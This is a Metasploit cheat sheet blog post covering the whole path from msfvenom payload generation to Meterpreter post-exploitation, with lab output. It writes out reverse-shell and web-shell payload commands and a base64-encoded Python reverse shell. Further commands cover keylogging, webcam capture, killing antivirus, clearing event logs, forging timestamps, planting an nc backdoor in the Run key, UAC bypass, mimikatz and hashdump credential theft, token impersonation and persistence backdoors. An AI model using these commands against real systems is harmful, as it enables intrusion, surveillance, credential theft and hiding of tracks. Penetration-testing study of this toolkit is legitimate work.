Tools | 36 min
MSF Cheat Sheet
February 20, 2023. Last updated February 20, 2025.
msf

1. Installation, startup and initialization

Installation

bash
# Install (the script adds Rapid7's package repository and installs the framework package; read it before running it)
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# Location after installation
# /opt/metasploit-framework/embedded/framework/

# Directory layout
--modules   the part worth studying
  --auxiliary  helper modules (scanning, sniffing, injection, brute forcing, vulnerability discovery)
  --encoders   encoders that transform payloads to get past intrusion detection and filtering
  --exploits   exploit modules for well-known vulnerabilities, named platform/service/module
  --nops       NOP generators, used to build sled bytes that evade detection of the classic overflow sled
  --payloads   payloads, the code that actually runs on the target
  --post       post-exploitation modules run after an exploit succeeds (privilege escalation, hash dumping, ...)
  --evasion    newer; builds evasive payloads, overlapping with what msfvenom does
--data      meterpreter, passiveX, VNC, DLLs and similar components, user-interface code, and data files used by msfweb and other modules
--plugins   plugins that must be loaded with the `load` command (database connectors and others)
--scripts   mostly meterpreter scripts; the source of commands such as migrate (moving into another process) lives here
--tools     assorted helper scripts and standalone utilities

Startup

bash
# From the shell: create the PostgreSQL database and ~/.msf4/database.yml (run once)
$ msfdb init
# Start the console
$ msfconsole
# Inside msfconsole: check the database connection
msf > db_status
# Inside msfconsole: rebuild the module cache. Metasploit 4 only; the command was removed in
# Metasploit 5, where the cache is refreshed automatically on startup
msf > db_rebuild_cache

2. Basic msf commands

bash
show exploits   - list all available exploit modules
show auxiliary  - list all available auxiliary modules
show options    - show the options of the current module
show payloads   - list the payloads compatible with the current module
show targets    - list the target types the current module supports
search          - search modules by keyword
info            - show the details of a module
use             - select a module
back            - leave the current module
set/unset       - set/clear an option of the current module
setg/unsetg     - set/clear a global option that applies to every module
save            - save the current settings so they survive a restart of the console

3. Generating payloads with msfvenom

bash
-p, --payload    <payload>       payload to use
-l, --list       [module_type]   list the available modules of a type: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-n, --nopsled    <length>        prepend a NOP sled of the given length to the payload
-f, --format     <format>        output format (see --help-formats for the list)
-e, --encoder    [encoder]       encoder to use
-a, --arch       <architecture>  target architecture of the payload
    --platform   <platform>      target platform of the payload
-s, --space      <length>        maximum size of the resulting payload
-b, --bad-chars  <list>          bytes that must not appear in the output, e.g. '\x00\xff' (forces an encoder)
-i, --iterations <count>         number of times to encode the payload
-c, --add-code   <path>          additional win32 shellcode file to include
-x, --template   <path>          custom executable to use as a template
-k, --keep                       preserve the template's behaviour and inject the payload as a new thread
    --payload-options            list the payload's standard options
-o, --out   <path>               save the payload to a file
-v, --var-name <name>            custom variable name to use in certain output formats
    --smallest                   generate the smallest possible payload
-h, --help                       show help
    --help-formats               list the supported output formats

1. Executables

Linux

bash
# Reverse connection: the target connects back to you, so LHOST/LPORT are your listener
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
# Bind: the payload listens on the target. Only LPORT is needed here; the handler is pointed at the target with RHOST
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=<Port to Listen On> -f elf > shell.elf

Windows

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

How to run: copy the executable to the target machine and execute it. The payload name must match the one set on exploit/multi/handler, and the handler should already be listening when the file runs.

2. Web payloads

PHP

bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
# Prepend an opening tag so the file is parsed as PHP from its first byte.
# pbcopy/pbpaste are macOS tools; on Linux the same edit is: sed -i '1s/^/<?php /' shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

How to run: place shell.php in the web root and request it with a browser, or run it directly with:

bash
php shell.php

3. Script shells

Python

bash
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

bash
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

How to run: paste the contents of shell.py into a Linux command line. The one-liner below (callback 192.168.88.128:4444) relies on `str.decode('base64')`, which only exists in Python 2; newer msfvenom versions emit a wrapper built on `base64.b64decode` that also runs under Python 3, so check which interpreter the target has:

bash
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

4. Shellcode

<language> is one of the source-code formats listed by --help-formats (for example c, python, csharp, powershell).

Linux based shellcode

bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows based shellcode

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac based shellcode

bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
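When shellcode is going into an exploit, the `-b` option in the option list above is what keeps bytes such as `\x00` out of it, but the result is only as good as the encoder's output, so it pays to check the final bytes rather than trust the flag. The following added example (not part of the original post or of Metasploit) rebuilds the raw bytes from `-f python` output and reports every forbidden byte with its offset. The `-f python` text embedded in the block is a constructed sample in the shape of msfvenom's output, with a deliberate `\x00` and `\x0a` in it; the function names are this example's own.

```python
import re

# Constructed sample in the shape of `msfvenom ... -f python` output (both the old
# 'buf = ""' and the current 'buf =  b""' styles are handled). It is made up for this
# example and contains a NUL byte at offset 6 and a line feed at offset 9.
SAMPLE_PYTHON_FORMAT = r'''buf =  b""
buf += b"\x31\xc0\x50\x68\x2f\x2f\x00\x73\x68\x0a\x68"
buf += b"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
'''

_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')   # one \xNN escape


def parse_msfvenom_python(text):
    """Rebuild the raw shellcode bytes from msfvenom's `-f python` output."""
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith('buf'):
            continue   # skip anything that is not a buf line (e.g. a trailing comment)
        out.extend(int(h, 16) for h in _ESC.findall(line))
    return bytes(out)


def parse_msfvenom_hex(text):
    """Rebuild the raw shellcode bytes from `-f hex` output."""
    return bytes.fromhex(text.strip())


def parse_badchars(spec):
    r"""Turn a -b specification such as '\x00\x0a\x0d' into a set of byte values."""
    return {int(h, 16) for h in _ESC.findall(spec)}


def find_bad_chars(shellcode, badchars):
    """Return {byte_value: [offsets]} for every forbidden byte present in the shellcode."""
    hits = {}
    for offset, value in enumerate(shellcode):
        if value in badchars:
            hits.setdefault(value, []).append(offset)
    return hits


def check_badchars(text, badspec):
    """Parse `-f python` output and check it against a -b style bad-character list.

    Returns (length_in_bytes, hits); an empty hits dict means the output is clean.
    """
    shellcode = parse_msfvenom_python(text)
    return len(shellcode), find_bad_chars(shellcode, parse_badchars(badspec))


if __name__ == '__main__':
    length, hits = check_badchars(SAMPLE_PYTHON_FORMAT, r'\x00\x0a\x0d')
    print('%d bytes' % length)
    for value, offsets in sorted(hits.items()):
        print('bad byte \\x%02x at offsets %s' % (value, offsets))
```

Run it on the real file with `msfvenom ... -b '\x00\x0a\x0d' -f python > sc.py` and `check_badchars(open('sc.py').read(), r'\x00\x0a\x0d')`. A non-empty result usually means the encoder's decoder stub, not the payload body, contains the byte; try another encoder with `-e` or more `-i` iterations.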

4. Basic Meterpreter commands

First you need a meterpreter session:

bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.81.160
set ExitOnSession false   # keep the handler listening after the first session arrives
exploit -j -z   # -j run as a background job, -z do not interact with a session when it opens
jobs            # list background jobs
kill <id>       # stop a background job
sessions -l     # list sessions
sessions -i 2   # interact with session 2
sessions -k 2   # kill session 2

If you first obtained a plain cmd shell (for example from ms17-010 with a shell payload), `sessions -u 2` upgrades that shell session to meterpreter (it runs post/multi/manage/shell_to_meterpreter behind the scenes).

Once you have meterpreter, post-exploitation can begin.

4.1 Basic system commands

bash
# Session management
background   # send the current session to the background
sessions     # list sessions
sessions -i  # switch to a session
quit         # close the current session and return to the msf prompt

# System
sysinfo   # target system information
idletime  # how long the target's user has been idle
reboot/shutdown   # reboot / shut down

# Shells
shell  # drop to a native command shell on the target
irb    # open a Ruby shell inside meterpreter

# Process migration
getpid          # PID of the process hosting meterpreter
ps              # list running processes
migrate <pid>   # move the meterpreter session into the given process
kill <pid>      # kill a process

# Running files
execute   # run a file on the target
execute -H -i -f cmd.exe   # spawn cmd.exe, -H hidden window, -i interact with it

# Webcam
webcam_list    # list webcams
webcam_chat    # start a video chat session
webcam_snap    # take a picture
webcam_stream  # stream video

# uictl: keyboard/mouse control
uictl [enable/disable] [keyboard/mouse/all]   # enable or disable keyboard/mouse input
uictl disable mouse      # disable the mouse
uictl disable keyboard   # disable the keyboard

# Desktops / screenshots
enumdesktops   # list available desktops
getdesktop     # show the desktop the current meterpreter is attached to
screenshot     # take a screenshot
use espia      # or load the espia extension and run screengrab
run vnc        # VNC remote desktop (legacy meterpreter script)

# Keylogging
keyscan_start  # start capturing keystrokes
keyscan_dump   # dump the captured keystrokes
keyscan_stop   # stop capturing

# Add a user and enable Remote Desktop
# RDP is enabled through registry edits (reg); the user is added by running net user via cmd.exe; the forward uses portfwd
run post/windows/manage/enable_rdp   # enable Remote Desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456   # also add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   # forward the target's port 3389 to local port 6662

# Stop antivirus processes
run killav
run post/windows/manage/killav

# Registry
reg -h   # registry command help
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32   # upload nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   # enumerate the values under Run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'   # create a Run value
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   # read the value back
nc -v 192.168.81.162 443   # from the attacker's machine: connect to the nc backdoor once it has started at the next logon

# Log clearing
clearev   # clear the Windows Application, System and Security event logs

4.2 File system commands

bash
cat/ls/cd/rm   # basic commands
search -f *pass* -d C:\\windows   # search for files; -h for help
getwd/pwd      # current directory on the target
getlwd/lpwd    # current directory on the attacker's machine
upload /tmp/hack.txt C:\\lltest   # upload a file
download c:\\lltest\\lltestpasswd.txt /tmp/   # download a file
edit c:\\1.txt   # edit a file (created if it does not exist)
mkdir lltest2    # create a directory (relative to the current directory unless an absolute path is given)
rmdir lltest2    # remove a directory
lcd /tmp         # change directory on the attacker's machine

# timestomp: forge file timestamps (MACE: modified, accessed, created, entry modified)
timestomp -h                        # help
timestomp -v C:\\2.txt              # show the timestamps of 2.txt
timestomp C:\\2.txt -f C:\\1.txt    # copy the timestamps of 1.txt onto 2.txt

4.3 Network commands

bash
# Basics
ipconfig/ifconfig
netstat -ano
arp
getproxy   # proxy settings
route      # routing table

# portfwd port forwarding
portfwd add -l 6666 -p 3389 -r 127.0.0.1   # forward the target's own port 3389 (-r is resolved on the target) to local port 6666
rdesktop -u Administrator -p ichunqiu 127.0.0.1:6666   # then connect rdesktop to the local end of the forward; -u user, -p password


# Adding routes

# Option 1: autoroute (deprecated meterpreter script)
run autoroute -h   # help
run autoroute -s 192.168.2.0/24   # route the target's internal network through this session
run autoroute -p   # show the routes added
# Option 2: post/multi/manage/autoroute
run post/multi/manage/autoroute CMD=autoadd   # add routes for every network the target is attached to
run post/multi/manage/autoroute CMD=print     # show the routes added
# (CMD accepts: add, autoadd, print, delete, default)

# With the routes in place, scan the internal network with arp_scanner, ping_sweep, portscan and so on
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
# scanners are auxiliary modules and run from the msf prompt (background the session first):
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.2.0/24
run

# After autoroute, msf's own modules can also act as a SOCKS proxy.
# Current versions have a single module, auxiliary/server/socks_proxy (set VERSION to 4a or 5);
# older versions shipped auxiliary/server/socks4a and auxiliary/server/socks5 (the latter shows up in the prompts below).
# background the session first, then:
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run

# Then add "socks5 127.0.0.1 1080" to /etc/proxychains.conf
# and run tools through the proxy with proxychains

# sniffer: packet capture
use sniffer
sniffer_interfaces   # list interfaces
sniffer_start 2      # start capturing on interface 2
sniffer_stats 2      # capture status
sniffer_dump 2 /tmp/lltest.pcap   # write the capture to a pcap file
sniffer_stop 2       # stop capturing

4.4 Information gathering

bash
# The gathering modules live in:
# modules/post/windows/gather
# modules/post/linux/gather
# Some commonly used ones:
run post/windows/gather/checkvm   # is the target a VM?
run post/linux/gather/checkvm     # is the target a VM?
run post/windows/gather/forensics/enum_drives   # list drives and partitions
run post/windows/gather/enum_applications   # installed software
run post/windows/gather/dumplinks   # recently opened files (from .lnk shortcuts)
run post/windows/gather/enum_ie     # IE history, cookies and saved credentials
run post/windows/gather/enum_chrome   # Chrome data (history, cookies, saved logins)
run post/windows/gather/enum_patches   # installed patches, and missing ones with known exploits
run post/windows/gather/enum_domain   # find the domain controller

4.5 Privilege escalation

1. getsystem

How getsystem's default technique (named pipe impersonation) works: (1) getsystem creates a new Windows service configured to run as SYSTEM; when started, the service connects to a named pipe. (2) getsystem spawns a process that creates that named pipe and waits for a connection from the service. (3) The service is started and connects to the pipe. (4) The process accepts the connection and calls ImpersonateNamedPipeClient, which yields an impersonation token for the SYSTEM user. With that SYSTEM token it spawns cmd.exe, and we have a SYSTEM-privileged process. Creating a service needs local administrator rights, and on Vista and later an elevated (non-UAC-restricted) session, so getsystem normally comes after a UAC bypass.

bash
getsystem

2. bypassuac

User Account Control (UAC) is a security mechanism introduced with Windows Vista that helps prevent unauthorized changes to the system. Applications and tasks always run in the security context of a non-administrator account unless an administrator specifically grants administrator-level access. UAC blocks unattended installation of unauthorized applications and prevents inadvertent changes to system settings.

msf provides the following modules for bypassing UAC:

bash
msf5 auxiliary(server/socks5) > search bypassuac

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   3  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   4  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   5  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   6  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   7  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

They are all used the same way: run the module against the current session, it returns a new elevated session, and then run getsystem in that session to get SYSTEM.

bash
# Example
meterpreter > getuid
Server username: SAUCERMAN\TideSec
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) >  use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/bypassuac) > run

[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 192.168.81.154
[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.

# Running getsystem in the new meterpreter session should then succeed.
# Here, however, the module reported a failure. The "Handler failed to bind" lines explain it: port 4444 was still
# held by the multi/handler job started earlier, and that job is what caught session 5; the module's own handler
# never bound and timed out. Kill that job, or give the bypassuac module a different LPORT, before running it.

3. Kernel exploits

Both Linux and Windows have had many high-impact vulnerabilities that can be used for privilege escalation, for example ms13-081, ms15-051, ms16-032 and ms17-010 on Windows, and msf ships exploit modules for them.

bash
meterpreter > run post/windows/gather/enum_patches   # list installed and missing patches
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit

# Example
meterpreter > run post/windows/gather/enum_patches

[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/local/bypassuac) > search MS13-081

Matching Modules
================

   #  Name                                             Disclosure Date  Rank     Check  Description
   -  ----                                             ---------------  ----     -----  -----------
   0  exploit/windows/local/ms13_081_track_popup_menu  2013-10-08       average  Yes    Windows TrackPopupMenuEx Win32k NULL Page


msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit

[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# This one failed as well: enum_patches itself flagged the module as "x86 Windows 7" only, and the session is on a
# 64-bit system (check with sysinfo before picking a kernel exploit). post/multi/recon/local_exploit_suggester
# runs the check methods of the local exploits against the current session and removes this guesswork.

4.6 Credential harvesting

On an internal network one administrator often manages many servers, and the passwords used are likely to be identical or follow a pattern. Getting hold of a password or hash and trying it against other internal servers can pay off handsomely.

1. Using mimikatz

bash
load mimikatz    # help mimikatz lists the commands
wdigest          # dump WDigest credentials (cleartext on Windows 7 and earlier by default)
mimikatz_command -f samdump::hashes   # run a raw mimikatz command
mimikatz_command -f sekurlsa::searchPasswords

# Example
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     SAUCERMAN$     
0;48748   NTLM                                    
0;999     NTLM       WORKGROUP     SAUCERMAN$     
0;476238  NTLM       SAUCERMAN     TideSec        123456
0;476209  NTLM       SAUCERMAN     TideSec        123456

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey    : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005)   # 0x5 = access denied: reading the SAM needs SYSTEM, run getsystem first
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }

# As the warning says, the mimikatz extension is the old 1.x build; on Windows 7 and later use `load kiwi` (mimikatz 2.x)
# and its commands creds_wdigest, creds_all, lsa_dump_sam and kiwi_cmd instead.
2. Using meterpreter's run hashdump command

bash
meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...

TideSec:"123456"

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Read the hashes before feeding them to a cracker: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (no LM hash stored), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. So Administrator and Guest have no password set here (on a default Windows 7 install both accounts are disabled), and only TideSec's hash is worth cracking. The password hint line gives the same answer for free.

3. post/windows/gather/smart_hashdump

As the warning above shows, upstream recommends post/windows/gather/smart_hashdump instead. It also stores the hashes in the database and in loot, in John the Ripper format.

bash
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     TideSec:"123456"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
4. powerdump

Same purpose as hashdump (dumps the SAM through PowerShell), but it failed here:

bash
meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 69921.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...

[-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.

4.7 Token impersonation

When a user logs on to Windows, the system assigns that logon a token. The token is used for access checks whenever the user touches a system resource, much like a session or cookie on a website.

msf has an extension that lets us impersonate someone else's token and switch identity. In a domain environment, if a domain administrator has logged on to a host we already control, we can become that domain administrator. Listing and using other users' tokens requires administrator or SYSTEM rights, and only delegation-type tokens can be used for authentication to other hosts; impersonation-type tokens work locally only.

bash
# 1. incognito
use incognito      # help incognito lists the commands
list_tokens -u     # list the available tokens by user
impersonate_token 'NT AUTHORITY\SYSTEM'   # impersonate the SYSTEM token
impersonate_token NT\ AUTHORITY\\SYSTEM   # the same without quotes; backslashes must be doubled
execute -f cmd.exe -i -t   # -t run with the impersonated token
# or simply: shell
rev2self   # drop back to the original token

# 2. steal_token
steal_token <pid>   # steal the token of a process (find the pid with ps)
drop_token          # release the stolen token

4.8 Persistence

Meterpreter is shellcode that lives only in memory; control is lost as soon as the target reboots. This section covers how to plant a backdoor to keep access.

1. persistence: startup-item backdoor

Path: metasploit/scripts/meterpreter/persistence

It uploads a VBS script to C:\Users\***\AppData\Local\Temp\ and, with -X, registers it under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ so it starts at boot (-U uses the HKCU Run key for the current user's logon instead, -S installs it as a service). It is easily caught by antivirus and is deprecated upstream.

bash
run persistence -h   # help
run persistence -X -i 5 -p 4444 -r 192.168.81.160
# -X start at boot, -i reconnect interval in seconds (5), -p port, -r the attacker's IP
# Example
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444
[*] Persistent agent script is 99630 bytes long
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[+] Agent executed with PID 3540
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua

Keep the cleanup resource file it prints; running it with `resource <path>` in msfconsole removes the script and the Run key. exploit/windows/local/persistence does the same job as a proper module.

2. metsvc service backdoor

metsvc works differently from the persistence script: it uploads metsrv.dll, metsvc-server.exe and metsvc.exe to a temporary directory and installs them as a Windows service that listens on TCP port 31337 (a bind payload; connect to it with exploit/multi/handler and the windows/metsvc_bind_tcp payload). Installing a service requires administrator rights, which is why it fails below. The script is deprecated upstream.

bash
run metsvc -A   # install the service

# Example
meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
    Cannot open service manager (0x00000005)   # 0x5 = access denied: the session is not running as administrator

meterpreter > ls
Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  178688  fil   2019-06-12 06:46:20 -0700  metsrv.dll
100777/rwxrwxrwx  45056   fil   2019-06-12 06:46:21 -0700  metsvc-server.exe
100777/rwxrwxrwx  61440   fil   2019-06-12 06:46:21 -0700  metsvc.exe

The three files were uploaded, but the service could not be started, so the attempt failed. `run metsvc -r` removes the service.

3. persistence_exe

Now for what upstream recommends instead:

bash
meterpreter > info post/windows/manage/persistence_exe

       Name: Windows Manage Persistent EXE Payload Installer
     Module: post/windows/manage/persistence_exe
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Merlyn drforbin Cousins <drforbin6@gmail.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to upload and execute.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Description:
  This Module will upload an executable to a remote host and make it 
  Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER 
  will start on user login, SYSTEM will start on system boot but 
  requires privs. SERVICE will create a new service which will start 
